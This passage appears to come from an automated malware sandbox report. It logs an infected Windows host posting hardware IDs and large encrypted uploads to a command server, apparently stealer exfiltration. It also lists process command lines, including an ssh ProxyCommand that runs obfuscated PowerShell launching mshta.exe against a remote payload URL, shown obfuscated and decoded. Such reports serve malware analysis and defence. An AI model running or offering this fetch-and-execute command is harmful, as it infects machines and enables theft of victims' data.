{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf4eb38afde9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1541&rtt_var=585&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15966&delivery_rate=1859872&cwnd=177&unsent_bytes=0&cid=18c2c5302f6daf7e&ts=2965&x=0"
2024-12-06 14:27:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-06 14:27:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49926	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:30 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TBLNHN5ZLRX1BG6T User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20560 Host: bendydully.click
2024-12-06 14:27:30 UTC	15331	OUT	Data Raw: 2d 2d 54 42 4c 4e 48 4e 35 5a 4c 52 58 31 42 47 36 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 37 36 31 37 32 42 30 32 38 36 42 38 44 45 41 43 30 46 30 33 31 45 42 45 45 31 35 37 44 0d 0a 2d 2d 54 42 4c 4e 48 4e 35 5a 4c 52 58 31 42 47 36 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 42 4c 4e 48 4e 35 5a 4c 52 58 31 42 47 36 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 53 45 4f 54 52 41 46 46 55 50 0d Data Ascii: --TBLNHN5ZLRX1BG6TContent-Disposition: form-data; name="hwid"7C876172B0286B8DEAC0F031EBEE157D--TBLNHN5ZLRX1BG6TContent-Disposition: form-data; name="pid"3--TBLNHN5ZLRX1BG6TContent-Disposition: form-data; name="lid"c2CoW0--SEOTRAFFUP
2024-12-06 14:27:30 UTC	5229	OUT	Data Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2024-12-06 14:27:33 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3alunuooep2bsitniv33mlf9gj; expires=Tue, 01-Apr-2025 08:14:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqGnTofWnzVkAx6oTBEc5rnqGIxhQ7I1DtTB61XSuSjCjX5G5VCMYlCbZRgBONGv07Maoex5TGrEdwcUCLSNk4KBdV9ttp972reRou8cBqRaCZZsVGMwuaFl%2F%2FiccZQ0eLuo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf505fc667c84-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=1845&rtt_var=1034&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21520&delivery_rate=1582655&cwnd=246&unsent_bytes=0&cid=4a42b118bfb107d4&ts=2859&x=0"
2024-12-06 14:27:33 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-06 14:27:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49937	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:34 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4W6ISP1QD9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1198 Host: bendydully.click
2024-12-06 14:27:34 UTC	1198	OUT	Data Raw: 2d 2d 34 57 36 49 53 50 31 51 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 37 36 31 37 32 42 30 32 38 36 42 38 44 45 41 43 30 46 30 33 31 45 42 45 45 31 35 37 44 0d 0a 2d 2d 34 57 36 49 53 50 31 51 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 57 36 49 53 50 31 51 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 53 45 4f 54 52 41 46 46 55 50 0d 0a 2d 2d 34 57 36 49 53 50 31 51 44 39 0d 0a 43 6f 6e Data Ascii: --4W6ISP1QD9Content-Disposition: form-data; name="hwid"7C876172B0286B8DEAC0F031EBEE157D--4W6ISP1QD9Content-Disposition: form-data; name="pid"1--4W6ISP1QD9Content-Disposition: form-data; name="lid"c2CoW0--SEOTRAFFUP--4W6ISP1QD9Con
2024-12-06 14:27:37 UTC	1023	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9ti6hg0uguos1mtfql42hevjig; expires=Tue, 01-Apr-2025 08:14:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=myz%2Bp%2BdbMYPb8B4wQUm38%2FltX%2FPxXq8aBuIn8A9Yw7W4uHjA2a4HALnm5%2BLHThRziYvW1D5NBLlKYCfoi5N%2Fjp9%2BkkAFSjT2fFo%2FVX9yu7a5vMxXZfKanyS9QtsbtiG9%2BQo5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf5207a8542c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2066&rtt_var=788&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2107&delivery_rate=1377358&cwnd=203&unsent_bytes=0&cid=3f19ec22282ee7dd&ts=3058&x=0"
2024-12-06 14:27:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-06 14:27:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49948	104.21.10.2	443	7320	C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Timestamp	Bytes transferred	Direction	Data
2024-12-06 14:27:39 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1LY816FYP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 547638 Host: bendydully.click
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 2d 2d 31 4c 59 38 31 36 46 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 37 36 31 37 32 42 30 32 38 36 42 38 44 45 41 43 30 46 30 33 31 45 42 45 45 31 35 37 44 0d 0a 2d 2d 31 4c 59 38 31 36 46 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 4c 59 38 31 36 46 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 53 45 4f 54 52 41 46 46 55 50 0d 0a 2d 2d 31 4c 59 38 31 36 46 59 50 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --1LY816FYPContent-Disposition: form-data; name="hwid"7C876172B0286B8DEAC0F031EBEE157D--1LY816FYPContent-Disposition: form-data; name="pid"1--1LY816FYPContent-Disposition: form-data; name="lid"c2CoW0--SEOTRAFFUP--1LY816FYPContent
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 6b 41 93 e3 f9 b3 94 cb 18 13 6a 3d 27 4f 7a 47 d6 b5 46 03 fd b1 78 20 9a 66 99 53 78 28 5c cc 0e 65 e0 8d 3d f8 41 6e 3f ee 74 82 79 52 e4 d8 a5 90 6a 22 7f 39 17 b1 1c b5 8f 6a 54 4c 42 3c c3 fd 92 39 66 78 f3 dd 24 e8 b9 89 91 1e de 4d 5e 9a 4d e0 e0 a1 c3 bc 4c f5 fb 1e f6 a6 01 32 e8 5d e3 68 b0 43 e4 ea 3c 0e 26 db 85 28 60 e1 32 de 4d b7 bd 23 4f bd a6 ce ba 57 9f b7 2c 9d eb e3 34 e4 02 66 d3 c0 d2 2d 7e 48 af 39 40 42 a5 cb 41 af 3b 7e cd 3e 7c e8 5b f2 b1 3f 48 5f 08 68 08 b3 f3 ae e5 f7 a0 98 be fd 81 35 86 14 c7 ba d3 5b 80 c3 5d cf d8 61 07 7d 87 f9 b6 ea 72 33 6b ca 83 01 ee d3 7c 4e e6 ff 9c bb ce 71 88 06 02 94 c5 c1 0a ee f7 76 f2 c3 40 44 b4 5a 14 cd e4 51 7f c7 ff ef 0a d6 fe 12 a5 a2 98 cf 6a 36 48 b5 bb d5 5c 43 83 f2 64 e0 b5 27 87 Data Ascii: kAj='OzGFx fSx(\e=An?tyRj"9jTLB<9fx$M^ML2]hC<&(`2M#OW,4f-~H9@BA;~>\|[?H_h5[]a}r3k\|Nqv@DZQj6H\Cd'
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 89 57 ad d2 c5 1c 6a a4 60 83 a2 e4 5b b6 44 1d 46 5a e9 6e e9 e9 3d e0 1c be f3 d7 a0 5c ab 28 78 77 79 6e b8 e3 bd 07 d7 4e b3 23 c5 bf 4d b5 4a c6 ef d7 43 eb d2 07 07 3e fd 9c b9 3b 1f 36 cb 2f be 79 ec 86 b0 06 4c 0a 49 f3 46 9b f6 85 60 f7 ec 71 ab f2 a9 ed 33 05 70 2b 65 60 25 ea f2 e6 e7 c7 b3 25 bb 1b 39 2c 26 bf 8e b7 93 47 38 9f c8 a5 74 46 ae dd 93 eb 2d 76 6d 2f e9 9b f5 ff de b7 b1 3a 35 fb fe 63 ff cd 3b ab 62 a0 fd 00 a3 fc 7b 43 f5 f2 4b 01 e0 de 99 eb f8 b2 8a 12 e8 f3 7f 8f bd 6c 44 31 a1 9a ff 2a 27 37 0c d0 c9 bf 8f 8d 7d b8 cf ed 09 b0 1a 03 a8 0d 31 5e 97 ab 30 d0 6d b2 54 80 65 39 85 64 35 1f 87 0e d6 82 93 53 6e 6d 84 ea ef bf 65 27 2d e7 61 66 53 e9 1a 9e 7f 4e 48 68 c6 a0 6a 47 98 bf d6 4a 26 1c ff 4b c1 d6 3a 03 c9 e2 4a 71 6e Data Ascii: Wj`[DFZn=\(xwynN#MJC>;6/yLIF`q3p+e`%%9,&G8tF-vm/:5c;b{CKlD1*'7}1^0mTe9d5Snme'-afSNHhjGJ&K:Jqn
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 02 b9 2e b4 41 b1 42 25 ea 80 41 f3 8a 73 60 a7 64 a8 6b 91 d4 54 57 13 07 d0 ca 6c 94 ab bd 05 26 dd 0d 25 69 b8 af 3f 2a a5 1e 2e 88 09 dd 0c cb 97 50 4a 7f 1a e1 ea 8f 6d 69 b8 ea e9 58 ca 25 f8 20 57 d1 e0 e6 10 26 b7 61 e6 a3 06 bd 81 83 0a d6 df a3 71 95 75 3b 71 2d e1 13 d8 2e d2 91 7f 7f eb 8c 6b 84 b7 d6 80 5b 2f cd c3 9a d2 2d c4 38 e7 f5 f0 3d dd 94 e6 47 0b 8c 1e df f7 4d b9 e2 e1 93 00 66 20 fb b2 e0 d2 46 70 60 6c 80 cf 40 2a 3a b2 4f ea 77 cd 1b 4a 6d 0d 31 f9 53 26 88 6f ae 94 06 ed 47 40 c5 07 53 c7 dc 89 f2 89 03 7f c6 5a 27 32 53 61 0e 66 f2 4f 9a c8 fc 6d fb 0b 02 c6 2a 91 e6 1a bd f7 3c 9b 65 42 2e a2 ae 9c 34 28 fa 66 b2 a6 d2 5e 58 c8 93 e6 ed 02 3b 51 42 a9 bd 35 cf a4 5e 40 59 01 87 3f 64 17 38 a2 69 d7 16 9c 7c c4 7f 67 59 98 70 Data Ascii: .AB%As`dkTWl&%i?.PJmiX% W&aqu;q-.k[/-8=GMf Fp`l@:OwJm1S&oG@SZ'2SafOm*<eB.4(f^X;QB5^@Y?d8i\|gYp
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: e2 27 c4 88 1b cd 17 61 de 9e cf 20 fe bd 06 42 a3 30 d9 45 bb 12 0b c8 d9 3d af 2f f5 7f fc 58 af a3 31 0b 21 f8 01 c6 90 fd 2a a1 8c 07 36 6e 4a dd 7e 10 20 89 ea 50 ef ff 7d 7c 3e 13 58 29 d3 05 20 6b 4f 72 28 31 94 84 a0 9f fb 11 19 c3 7a d3 47 bd 88 78 99 4b 4c 46 c2 00 70 72 b4 2d 4b bd 9f e6 8d dd 87 53 d5 e1 3b 29 4f 93 45 5b 7c 07 a8 76 38 ac ea 72 cf 52 ac 3a f9 b9 02 db e8 20 1c b6 f3 8d 08 63 a8 8b 24 6c a3 f6 70 e8 69 98 54 be 26 5c 5c 4c 2f 44 fc 12 35 77 cd fa ac 24 00 a0 69 ec ba b7 56 aa 69 c8 db 76 99 ca 77 72 f1 2d 02 9c d2 bc 2b 13 18 65 ba e1 ea 14 99 90 22 8a e6 fb 36 6c 4f 24 55 f5 ec 15 f1 1f 7a 36 82 87 19 66 e8 c6 11 f5 45 72 93 7a 6e 84 29 b3 ad 63 f3 28 0d 5e 84 ec 43 dc 26 17 dd 35 ec ea 95 80 db b4 c0 68 ee d3 e3 e1 6a a8 57 Data Ascii: 'a B0E=/X1!*6nJ~ P}\|>X) kOr(1zGxKLFpr-KS;)OE[\|v8rR: c$lpiT&\\L/D5w$iVivwr-+e"6lO$Uz6fErzn)c(^C&5hjW
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 2d 3f 5a c5 1c 87 f5 4d 83 42 44 f9 06 16 2e 76 cc d9 1a 84 07 a8 7f c4 98 39 9d 2c d7 08 61 56 f4 2b a2 f6 a1 8a de 7d f7 3f 22 a5 e0 bf 74 aa c0 7c 0f 59 fb 0b 44 1e 5e 75 38 53 1b f2 5f 4f 11 a6 2b 82 04 aa 2c 64 d5 d6 6d b6 fa 0c d4 e3 81 d8 fa eb 14 89 76 ff b5 cb 3b b8 d9 00 f7 1b b6 6d ef 6a a5 c5 6c be 9b 8a d3 e4 f5 3c 09 7a f5 4a 8d a1 8b 69 a5 66 7c 17 22 99 06 cc 9c 22 85 1a 35 b3 95 99 19 c3 22 9d 92 ad 7b e2 ad 9c ab 83 84 b9 47 10 6c 6b 98 f9 65 ca 96 62 f3 6f 65 d8 0c a2 4f 63 14 ab 93 6b f4 7c 10 77 82 09 a9 76 42 c6 e3 09 cf 15 cc 41 62 39 d2 4b 8a 8c 8a 55 5b 02 da fe 0c 33 b2 39 33 32 40 64 13 81 fa 13 54 40 be 9a a1 ce ff 2c b8 5a 52 64 c9 4a 16 01 81 97 e7 a5 03 ec db 2e 38 a9 c9 2a 55 20 1f 2b f7 29 67 65 64 58 a5 a7 3e 8d 6a 3d d8 Data Ascii: -?ZMBD.v9,aV+}?"t\|YD^u8S_O+,dmv;mjl<zJif\|""5"{GlkeboeOck\|wvBAb9KU[3932@dT@,ZRdJ.8*U +)gedX>j=
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 9b 25 d8 e7 fe 3f 94 be 7d df 42 c1 7e d0 eb 2d 8d 40 e4 cb 86 a7 77 00 92 ef c6 be 2c 34 fc ea 97 30 7d e9 f4 15 37 85 f0 e1 a3 55 98 aa 42 d0 85 30 8d d4 ab e6 88 63 11 6b 03 6e f4 b5 52 5a d2 54 8f c2 cf 51 7c d6 71 3b 2a ff e7 9e cf 6d b6 c5 19 a7 a7 ed c9 68 58 56 e0 c4 61 c4 86 ef 19 bf ad e9 ce f2 93 97 b6 b6 2e c0 32 54 2e 60 ed 82 c9 34 23 7b 89 b5 93 ba 45 cf 8e 26 f1 2a f0 f5 4a be 4a b7 08 a2 73 86 a1 15 2d 76 36 3e f0 8d d7 e1 5c f8 a4 1b 6e 26 cd 78 78 f6 18 d9 84 6c 1e 5b 32 c5 b4 40 82 0c 4b 82 b7 df 93 98 ff f6 f8 18 44 eb 91 a7 39 9e f9 b3 db 2b 90 f0 ea 06 df 3a 84 7d 8d 85 a6 c5 7b 1e 47 9c 48 38 12 2b 80 98 43 fe 2e 2d a4 45 bc b0 b8 58 ea 3d 3a 6e 1a ee e8 ec f0 34 46 46 44 d8 ba d8 28 f0 7a af 4e a0 93 18 22 bc 8e 9f 3d e3 34 aa 70 Data Ascii: %?}B~-@w,40}7UB0cknRZTQ\|q;mhXVa.2T.`4#{E&JJs-v6>\n&xxl[2@KD9+:}{GH8+C.-EX=:n4FFD(zN"=4p
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 5d ba f6 6c a6 87 65 d0 c8 f7 33 e4 f0 e7 96 94 1b af 37 0e ed 42 06 8a a9 ce 84 1c ae f7 62 b6 1c ec 60 14 11 50 88 99 f2 ae ac 29 a4 23 e7 9a f5 77 fd a2 b2 33 82 a2 15 51 e1 39 ef 21 db d7 3d 3b f0 80 e4 5f 9f 3f 7f e8 eb 57 03 50 40 fd 8c 7c a6 65 28 ae 3f bb 9c 77 cd cd a8 f7 79 a2 56 26 f6 75 e6 72 d0 d1 af f5 bf 6d 1f bc ce d5 01 ce 18 ba 95 9d 64 b4 ef eb 9b af 31 41 4e a1 07 4f 1f ed ef 43 e0 de da 46 6f ed dd 69 38 b7 27 6e 1c b7 ad 60 f3 50 93 09 2e c4 bb 4c 98 6c 42 d6 43 29 27 08 bb c1 4b 2b 1c ad 7a 06 33 7d 3d 6e d6 68 e3 b3 77 41 42 48 d7 59 2b 5b d9 05 68 f2 33 94 b7 02 24 e4 f7 4c 7e 7c 1f d6 3d bb 43 8a 52 ad 78 e1 56 b7 6e c9 a3 3b 97 3e 35 29 22 d6 2e 26 66 63 c2 53 91 58 62 3f d2 fa a7 31 c5 1b 7a 69 6d fd 34 8a 1f db ac d6 88 e0 99 Data Ascii: ]le37Bb`P)#w3Q9!=;_?WP@\|e(?wyV&urmd1ANOCFoi8'n`P.LlBC)'K+z3}=nhwABHY+[h3$L~\|=CRxVn;>5)".&fcSXb?1zim4
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: fb c7 7d c0 b2 27 50 fe 77 0c eb 19 0b e6 61 11 20 89 40 15 27 82 8f 72 e0 c9 4e b6 d0 40 eb 3e 60 80 e5 6f 8f 61 20 62 76 96 41 67 5e 7b 6c 94 65 b6 28 4e d7 de 66 ce 39 cd ef b5 b0 00 d5 44 13 5c 55 22 4b 32 ac 42 4a aa 1b 76 37 db f5 c6 9b 2a 49 26 e3 ef b1 02 0f 77 76 d1 40 36 81 38 06 eb 34 2c 38 18 3d 09 cb b5 3e 5b e9 d4 ff 11 48 ff 90 96 9a 56 ea fc 4f a8 bd 76 63 6c 0a bc 18 19 c6 70 59 8c e7 9d ea 91 8d 46 23 60 d7 7c 2b 09 c7 c2 fa 90 61 e4 ed 75 37 c4 58 6e a3 65 bb e1 49 2d e6 74 33 6d c2 b0 d9 dc cb 5d b8 c5 e1 a6 2d db 7f 13 76 c2 c8 0f a3 33 15 5e a0 db 3d 72 55 33 98 26 d3 cb c7 41 bc 42 c1 a0 83 17 25 f7 40 6f 8d 45 c0 f2 eb c2 bf f7 66 e0 e7 77 4d d4 9a e7 ed b6 4c fd 14 f4 ab 06 70 ae 73 5b 61 f2 04 90 59 06 db 15 37 a4 dc ad 80 f4 14 Data Ascii: }'Pwa @'rN@>`oa bvAg^{le(Nf9D\U"K2BJv7*I&wv@684,8=>[HVOvclpYF#`\|+au7XneI-t3m]-v3^=rU3&AB%@oEfwMLps[aY7
2024-12-06 14:27:39 UTC	15331	OUT	Data Raw: 3e 42 23 ce 13 fa 31 4a f1 84 f6 ee 08 17 50 00 65 3c a4 f5 63 0c 7d 56 85 7e 99 e0 29 5e 72 e5 9f 78 e8 fa ca 17 5e ea 92 ee 88 92 78 eb 3f ea f1 48 fa ec 18 ec 0d e0 f9 4b 66 a6 41 36 5f bc 0e 80 ec d6 9d 60 33 b9 49 96 11 b6 f8 ae 5f 85 89 13 98 75 d1 12 8f ff f7 8a 05 e4 ab d6 f6 a3 78 d4 23 f2 14 0d 2c b0 3b ad 46 70 eb f9 9a f8 fb a6 45 ae 32 8e 7d 9d eb 75 71 39 79 f7 50 66 27 cf 41 5f 19 b7 38 b4 93 fe 28 8d 97 fc e6 38 21 1d 46 66 92 4a 96 31 40 78 71 24 5d 69 65 8b e9 2f f3 d4 51 d5 72 c9 bb 6e fb 83 b7 6c cd b5 b7 53 a5 d3 43 a3 19 4a d8 6e 1b 6a 0a 3e b8 8e 07 71 ab 21 0c 26 fb 37 3e 15 1d 8f 21 8e 41 a7 8e 4f 58 4f d4 5f c8 0f 60 4b d5 5f 3c 8a 51 4f 43 06 44 87 9c 86 9d 1d 88 48 c5 da 4c 64 91 93 c8 77 75 c8 2a 22 2a be 77 30 c4 5b a4 5e 8c Data Ascii: >B#1JPe<c}V~)^rx^x?HKfA6_`3I_ux#,;FpE2}uq9yPf'A_8(8!FfJ1@xq$]ie/QrnlSCJnj>q!&7>!AOXO_`K_<QOCDHLdwu"w0[^
2024-12-06 14:27:43 UTC	1022	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 14:27:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hbubbq8fklhkhtanopb33f0sis; expires=Tue, 01-Apr-2025 08:14:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cp4WuCuSpkfj0%2BVkbp4NfZc4VC0jhqPraUvC%2FDlKpKsAzVB8Slnxnhd6lFvf%2BruXd%2FvIEeQgNSiU4RMOWJurYILexUGRyXcJnhYchFVnrqjU%2FlAYk5B1dVNSTrphF0K%2FSu6R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8edcf53cea82424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1732&rtt_var=866&sent=266&recv=568&lost=0&retrans=1&sent_bytes=4220&recv_bytes=550110&delivery_rate=187684&cwnd=248&unsent_bytes=0&cid=bce0eef77f9bceff&ts=3955&x=0"

Target ID:	0
Start time:	09:25:36
Start date:	06/12/2024
Path:	C:\Windows\System32\OpenSSH\ssh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" .
Imagebase:	0x7ff77c690000
File size:	946'176 bytes
MD5 hash:	C05426E6F6DFB30FB78FBA874A2FF7DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:25:36
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:25:36
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:25:38
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://wserdtfyguhij.2024-vipticket.com/k.mp4"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:25:39
Start date:	06/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4
Imagebase:	0x7ff674fe0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:25:42
Start date:	06/12/2024
Path:	C:\Windows\System32\svchost.exe
